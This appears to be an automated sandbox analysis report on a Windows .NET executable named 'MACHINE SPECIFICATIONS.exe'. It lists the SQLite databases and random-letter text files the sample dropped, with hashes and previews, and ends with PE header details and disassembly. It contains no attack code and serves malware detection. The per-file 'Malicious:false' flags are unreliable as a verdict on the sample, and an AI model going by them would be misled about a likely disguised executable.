                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1026
                                                                                  Entropy (8bit):4.685942106278079
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
                                                                                  MD5:3F6896A097F6B0AE6A2BF3826C813DFC
                                                                                  SHA1:951214AB37DEA766005DD981B0B3D61F936B035B
                                                                                  SHA-256:E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
                                                                                  SHA-512:C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
                                                                                  Malicious:false
                                                                                  Preview:PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1026
                                                                                  Entropy (8bit):4.701704028955216
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
                                                                                  MD5:5F97B24D9F05FA0379F5E540DA8A05B0
                                                                                  SHA1:D4E1A893EFD370529484B46EE2F40595842C849E
                                                                                  SHA-256:58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
                                                                                  SHA-512:A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
                                                                                  Malicious:false
                                                                                  Preview:BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1026
                                                                                  Entropy (8bit):4.685942106278079
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
                                                                                  MD5:3F6896A097F6B0AE6A2BF3826C813DFC
                                                                                  SHA1:951214AB37DEA766005DD981B0B3D61F936B035B
                                                                                  SHA-256:E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
                                                                                  SHA-512:C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
                                                                                  Malicious:false
                                                                                  Preview:PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1026
                                                                                  Entropy (8bit):4.69422273140364
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                  MD5:A686C2E2230002C3810CB3638589BF01
                                                                                  SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                  SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                  SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                  Malicious:false
                                                                                  Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:modified
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6970840431455908
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                  MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                  SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                  SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                  SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6970840431455908
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                  MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                  SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                  SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                  SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):7.009000426055696
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  File name:MACHINE SPECIFICATIONS.exe
                                                                                  File size:1190912
                                                                                  MD5:6a54566bf72bc5f07bac04c982dab3e6
                                                                                  SHA1:603a754281efa379d923304ba0e8e551888c2188
                                                                                  SHA256:b618d6a08d5d165812cef6e3f1239b33bd4ab60971c3a41d1da8fc22bfb9ac9a
                                                                                  SHA512:40034d737f5bf0f99b5025f9ff75388ce5248f9af578f3b50638a9f86f34e69ca6f3909839ddf3451f11a3b44dec394c091af1ccf5c9bd8810d76ada6ac87607
                                                                                  SSDEEP:24576:x6IpB32sS0FxVv0XNOYr0NBr4+NoIiICaebYsyEr6jlWp:x6M2woNOi0NBr4+NoIiICaebYszP
                                                                                  TLSH:4B450731205C8951DFAE2E3AC3AF96DC16791DEA9A57850D31C77783C522E036C9B32B
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8.e..........."...0......^........... ........@.. ....................................`................................
                                                                                  Icon Hash:8604a4acbcace4f8
                                                                                  Entrypoint:0x4eeace
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                  Time Stamp:0xD2658D38 [Sat Nov 8 23:37:28 2081 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
